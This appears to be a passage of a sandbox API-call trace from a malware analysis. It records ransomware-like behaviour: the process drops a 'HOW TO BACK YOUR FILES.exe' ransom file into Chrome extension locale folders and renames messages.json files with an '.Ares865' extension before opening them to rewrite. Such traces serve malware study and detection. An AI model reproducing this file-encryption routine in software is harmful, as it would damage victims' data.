[0102.153] lstrcpyW (in: lpString1=0x2cce510, lpString2="vi" | out: lpString1="vi") returned="vi" [0102.153] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_CN" | out: lpString1="zh_CN") returned="zh_CN" [0102.153] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_TW" | out: lpString1="zh_TW") returned="zh_TW" [0102.153] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW" [0102.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW" [0102.153] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.153] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.154] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.154] GetLastError () returned 0x0 [0102.154] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8422fb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e92bd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e92bd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.154] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.154] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.155] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.155] lstrlenW (lpString="messages.json") returned 13 [0102.155] lstrlenW (lpString="Ares865") returned 7 [0102.155] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.155] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.Ares865") returned 163 [0102.155] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=212) returned 1 [0102.160] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN" [0102.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN" [0102.160] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.160] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.161] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.161] GetLastError () returned 0x0 [0102.161] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84228600, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e92bd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e92bd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.161] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.161] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.162] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.162] lstrlenW (lpString="messages.json") returned 13 [0102.162] lstrlenW (lpString="Ares865") returned 7 [0102.162] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.162] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.Ares865") returned 163 [0102.162] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.164] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=212) returned 1 [0102.168] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi" [0102.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi" [0102.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.169] GetLastError () returned 0x0 [0102.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x842210d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e951ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e951ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.169] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.169] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.169] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.169] lstrlenW (lpString="messages.json") returned 13 [0102.169] lstrlenW (lpString="Ares865") returned 7 [0102.169] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.Ares865") returned 160 [0102.170] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.193] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=227) returned 1 [0102.196] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk" [0102.196] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk" [0102.196] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.197] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.197] GetLastError () returned 0x0 [0102.197] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84219ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e951ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e951ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.197] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.197] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.198] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.198] lstrlenW (lpString="messages.json") returned 13 [0102.198] lstrlenW (lpString="Ares865") returned 7 [0102.198] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.198] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.Ares865") returned 160 [0102.198] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.200] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0102.203] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr" [0102.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr" [0102.203] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.203] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.204] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.204] GetLastError () returned 0x0 [0102.204] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84212670, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e978040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e978040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.204] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.204] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.205] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.205] lstrlenW (lpString="messages.json") returned 13 [0102.205] lstrlenW (lpString="Ares865") returned 7 [0102.205] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.205] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.Ares865") returned 160 [0102.205] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.ares865"), 